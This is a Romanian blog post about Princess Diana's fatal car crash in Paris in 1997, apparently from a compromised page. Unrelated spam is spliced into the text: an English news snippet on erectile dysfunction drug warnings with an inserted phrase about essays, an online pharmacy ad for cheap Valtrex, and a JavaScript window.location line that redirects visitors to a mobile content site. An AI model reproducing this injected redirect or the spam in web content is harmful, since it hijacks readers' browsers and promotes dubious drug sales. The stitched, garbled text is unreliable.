Într-o zi de 31 august…

u.s. consumer group public citizen contends drugs to treat Erectile Dysfunction writing unique essays need stronger warnings about the risk of blindness on their packaging. they claim the u.s. food and drug administration should "immediately add a black box warning regarding the risks of drug-induced blindness for the three phosphodiesterase 5 (pde5) inhibitors that are prescribed for the treatment of Erectile Dysfunction." (oct-23-05) [reuters today ]

…in 1997, Printesa de Wales, Lady Diana, in varsta de 36 de ani, si prietenul sau, Dodi al Fayed, isi pierdeau viata intr-un accident de masina, la Paris.

Order Online at USA Pharmacy! Cheap Valtrex 1000mg. Approved Pharmacy, Cheap Generic Valtrex online.

princess_lady_diana_spencer_of_wales

Putin dupa miezul noptii, in primele ore ale zilei de 31 August 1997, o limuzina s-a zdrobit de un pilon al unui tunel din Franta. In masina se aflau Diana, Printesa de Wales si iubitul ei Dodi Al Fayed, fiul unui miliardar egiptean. Al Fayed si soferul au fost declarati morti la fata locului. Diana a fost dusa de o ambulanta la Spitalul Pitie-Salpetriere, unde a murit in cateva ore dupa un stop cardiac. Singurul care a supravietuit accidentului a fost bodyguardul lui Al Fayed. La inmormantarea Dianei au participat milioane de oameni, in timp ce doua miliarde au privit de-acasa. “Cea mai mare ironie legata de Diana este urmatoarea: desi a avut numele zeitei vanatorii, a sfarsit prin a fi ea cea mai vanata persoana din era moderna” a spus la inmormantare, Earl of Spencer, fratele Printesei. Asaltata de presa incepand din ziua anuntului logodnei sale cu Charles, Diana n-a avut practic niciun moment de intimitate, indiferent de locul in care se afla sau de ora. Chiar si in ultima secunda a vietii ei, presa alerga in urma ei. Printre primele si cele mai cunoscute detalii legate de accidentul ei se numara faptul ca soferul mergea cu viteza pentru a evita paparazzi. Imediat, vina a fost aruncata pe ei, fiind numiti “ucigasi lasi” si “asasini”. Singurul argument in favoarea lor a venit in momentul in care soferului Dianei i s-a facut alcoolemia. Henri Paul avea alcool in sange de peste 3 ori mai mult decat permite legea. Moartea Dianei este subiectul a nenumarate carti.

window.location = “http://www.mobilecontentstore.mobi/?sl=319481-c261c&data1=Track1&data2=Track2”;

Lasă un răspuns

Adresa ta de email nu va fi publicată. Câmpurile necesare sunt marcate *